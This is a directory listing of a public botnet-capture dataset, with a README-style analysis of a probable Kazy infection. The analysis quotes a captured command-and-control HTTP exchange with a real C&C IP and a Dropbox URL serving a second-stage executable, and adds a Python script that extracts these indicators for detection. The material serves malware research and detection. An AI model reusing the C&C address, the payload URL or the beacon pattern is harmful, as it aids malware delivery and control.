Index of /publicDatasets/CTU-Malware-Capture-Botnet-116-1

Name                                        Last modified       Size
Parent Directory                            -                   -
2012-05-25-capture-1.biargus                2016-12-05 22:30    246K
2012-05-25-capture-1.binetflow              2016-12-05 22:30    94K
2012-05-25-capture-1.capinfos               2015-04-09 20:39    713
2012-05-25-capture-1.dnstop                 2016-12-05 22:30    12K
2012-05-25-capture-1.html                   2015-04-09 20:41    7.3M
2012-05-25-capture-1.json                   2015-04-09 20:41    16M
2012-05-25-capture-1.passivedns             2016-12-05 22:30    20K
2012-05-25-capture-1.pcap                   2017-04-25 09:29    12M
2012-05-25-capture-1.tcpdstat               2016-12-05 22:30    2.4K
2012-05-25-capture-1.tcpflow-report.pdf     2015-02-13 12:50    20K
2012-05-25-capture-1.uniargus               2016-12-05 22:30    1.2M
2012-05-25-capture-1.uninetflow             2016-12-05 22:30    515K
2012-05-25-capture-1.weblogng               2016-06-15 19:07    131K
948549816.111111.exe.zip                    2015-12-16 10:26    285K
README.html                                 2017-04-25 09:30    1.2K
README.md                                   2015-10-07 13:58    1.0K
bro/                                        2017-04-25 09:30    -
fast-flux-dga-first-analysis.txt            2017-01-15 13:04    196

Analysis of probable Kazy

Timeline

Fri May 25 12:59:56 ART 2012

The C&C traffic is plain HTTP (not encrypted), and the second-stage payload is hosted on Dropbox:

POST /cmd.php HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 0
Host: 46.105.227.94

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-7+squeeze9
Content-type: text/html
Transfer-Encoding: chunked
Date: Fri, 25 May 2012 16:01:10 GMT
Server: lighttpd/1.4.28

45
http://dl.dropbox.com/u/60244633/d6026fff2e326a77b1afd69a60afe42c.exe
0
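The exchange above is a complete beacon: an empty POST to cmd.php, answered with a chunked body whose single chunk (0x45 = 69 bytes) is exactly the payload URL. As an added triage example that is not part of the CTU dataset or its README, the script below decodes that chunked response, extracts the download URL as an indicator, and flags the traits of the beacon that a detection rule can key on (empty POST, WinHttpRequest user agent, bare-IP Host header, executable URL in the reply). The two messages are reproduced from the README; the heuristics, function names and output structure are my own assumptions, not anything the dataset authors specify.

```python
import re
from urllib.parse import urlsplit

# Both messages below are copied from the README's captured exchange (CRLF line endings added).
REQUEST = (
    "POST /cmd.php HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: text/plain; Charset=UTF-8\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Content-Length: 0\r\n"
    "Host: 46.105.227.94\r\n"
    "\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "X-Powered-By: PHP/5.3.3-7+squeeze9\r\n"
    "Content-type: text/html\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Date: Fri, 25 May 2012 16:01:10 GMT\r\n"
    "Server: lighttpd/1.4.28\r\n"
    "\r\n"
    "45\r\n"
    "http://dl.dropbox.com/u/60244633/d6026fff2e326a77b1afd69a60afe42c.exe\r\n"
    "0\r\n"
    "\r\n"
)

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
BARE_IP_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def parse_message(raw):
    """Split an HTTP/1.1 message into (start line, lower-cased header dict, raw body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body):
    """Reassemble a Transfer-Encoding: chunked body (hex size line, data, CRLF, ... , 0)."""
    out = []
    pos = 0
    while True:
        end = body.index("\r\n", pos)
        size = int(body[pos:end].split(";")[0], 16)  # ignore any chunk extensions
        pos = end + 2
        if size == 0:
            break
        out.append(body[pos:pos + size])
        pos += size + 2  # skip the chunk data and its trailing CRLF
    return "".join(out)


def analyze_exchange(request, response):
    """Return the C&C host, any payload URLs, and the beacon traits worth alerting on."""
    req_start, req_headers, _ = parse_message(request)
    _, resp_headers, resp_body = parse_message(response)
    if resp_headers.get("transfer-encoding", "").lower() == "chunked":
        resp_body = decode_chunked(resp_body)

    findings = []
    method, path, _ = req_start.split(" ", 2)
    if method == "POST" and req_headers.get("content-length") == "0":
        findings.append("empty POST beacon to " + path)
    if "WinHttp.WinHttpRequest" in req_headers.get("user-agent", ""):
        findings.append("WinHttpRequest user agent (scripted client, not a browser)")
    if BARE_IP_RE.fullmatch(req_headers.get("host", "")):
        findings.append("Host header is a bare IP address")

    payload_urls = [u for u in URL_RE.findall(resp_body) if u.lower().endswith(".exe")]
    if payload_urls:
        findings.append("response body hands out executable URL(s)")

    return {
        "c2_host": req_headers.get("host"),
        "payload_urls": payload_urls,
        "payload_hosts": sorted({urlsplit(u).hostname for u in payload_urls}),
        "findings": findings,
    }


if __name__ == "__main__":
    result = analyze_exchange(REQUEST, RESPONSE)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against the captured pair it reports the C&C host, the single Dropbox URL (and dl.dropbox.com as the hosting domain, which is why blocking on the C&C IP alone would not stop the download), and four findings; the same function can be fed request/response pairs carved out of the pcap or the Bro HTTP log to check whether later beacons return different URLs.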